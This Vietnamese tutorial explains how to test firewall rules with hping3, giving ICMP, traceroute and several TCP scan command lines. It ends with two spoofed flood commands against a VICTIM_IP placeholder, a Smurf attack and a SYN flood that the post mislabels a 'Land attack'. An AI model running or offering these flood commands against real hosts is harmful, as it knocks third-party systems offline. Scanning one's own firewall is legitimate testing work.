Hell Cat-Loli Team: Kiểm tra Firewall Rules với công cụ Hping3

Tổng quan về công cụ Hping3

Hping3 là một công cụ để tạo kịch bản sử dụng ngôn ngữ TCL, các gói được gửi – nhận thông qua các chuỗi nhị phân, hoặc các chuỗi mô tả cho các gói. Ví dụ: xây dựng các kịch bản về kiểm tra Firewall, kiểm tra chồng giao thức TCP/IP, một vài dạng tấn công phổ biến, xây dựng bảng định tuyến. Hping3 hoạt động ở chế độ dòng lệnh, Scripts có thể tạo và đọc các gói; các lệnh với mục đích đọc, triển khai, liệt kê các cổng, bảng ARP, bảng định tuyến và firewalling. Hping3 không chỉ là một gói đơn thuần với phần mở rộng dành cho scripting language, nó là một công cụ bảo mật có tính chất kịch bản. Tuy nhiên Hping3 scripts có thể truy xuất hầu hết các tính năng của ngôn ngữ TCL, vì vậy kết quả scan cổng sử dụng Hping3 có thể được lưu trữ trong cơ sở dữ liệu MySQL, vẽ lưu đồ với những port mở và nhiều thứ khác

Kiểm tra Firewall rules với Hping3

• Testing ICMP: trong ví dụ Hping3 sẽ gần như là một gói ping bình thường, gửi ICMP-echo và nhận về ICMP-reply

Hping3 -1 domainexample.com

• Traceroute sử dụng ICMP: ví dụ này giống như tracert trên hệ điều hành windows hoặc traceroute trên hệ điều hành linux, giá trị TTL sẽ tăng lần lượt 1đơn vị trong gói ICMP.

Hping3 –traceroute -V -1 domainexample.com

• Checking port: Ở đây Hping3 sẽ gửi gói SYN tới port đã xác định (ví dụ này sử dụng port 80). Local port bắt đầu scan là (5050).

Hping3 -V -S -p 80 -s 5050 domainexample.com

• Traceroute để xác định ra port: sử dụng traceroute để xác định ra vị trí mà gói của bạn bị blocked.

Hping3 –traceroute -V -S -p 80 -s 5050 domainexample.com

• Các loại khác của gói ICMP: ví dụ này gửi gói ICMP address mask request (Type 17).

Hping3 -c 1 -V -1 -C 17 domainexample.com

• Các loại khác của Port Scanning: Loại đầu tiên; FIN scan. Đối với kết nối TCP thì cờ FIN được sử dụng để bắt đầu quá trình đóng kết nối. Nếu chúng ta không nhận reply, có nghĩa là port mở. Thông thường firewalls gửi ngược trở lại gói RST + ACK nhằm thể hiện port đã được đóng.

Hping3 -c 1 -V -p 80 -s 5050 -F domainexample.com

• ACK Scan: Kiểu scan này được sử dụng nhằm xác định ra host, nếu như host đó tồn tại (khi không được phép sử dụng lệnh ping). Lúc này sẽ gửi hồi đáp RST nếu port mở.

Hping3 -c 1 -V -p 80 -s 5050 -A domainexample.com

• . Xmas Scan: Kiểu scan này thiết lập sequence number về 0 và thiết lập cờ URG + PSH + FIN trong gói. Nếu như port TCP của thiết bị đích đóng, thì thiết bị đích gửi gói TCP RST trong nội dung reply. Nếu như port TCP của thiết bị đích mở, thì thiết bị đích discards kiểu TCP Xmas scan và không gửi reply.

Hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF domainexample.com

• Null Scan: Kiểu scan này thiết lập sequence number về 0 và không có bất kỳ một cờ nào được thiết lập trong gói. Nếu như port TCP của thiết bị đích đóng, thì thiết bị đích gửi TCP RST packet trong reply. Nếu như port TCP của thiết bị đích mở, thì thiết bị đích discards TCP NULL scan và không gửi reply.

Hping3 -c 1 -V -p 80 -s 5050 -Y domainexample.com

• Smurf Attack: đây thuộc về kiểu tấn công denial-of-service thông qua việc floods tới hệ thống đích bằng việc giả mạo broadcast trong thông điệp ping.

Hping3 -1 –flood -a VICTIM_IP BROADCAST_ADDRESS

• DOS Land Attack:

Hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 –flood –rand-source VICTIM_IP

• Một số tham số khác.

–flood: sent packets as fast as possible. Don’t show replies.

–rand-dest: random destionation address mode. see the man.

-V <– Verbose

-c –count: packet count

-d –data: data size

-S –syn: set SYN flag

-w –win: winsize (default 64)

-p –destport [+][+]<port> destination port(default 0) ctrl+z inc/dec

-s –baseport: base source port (default random)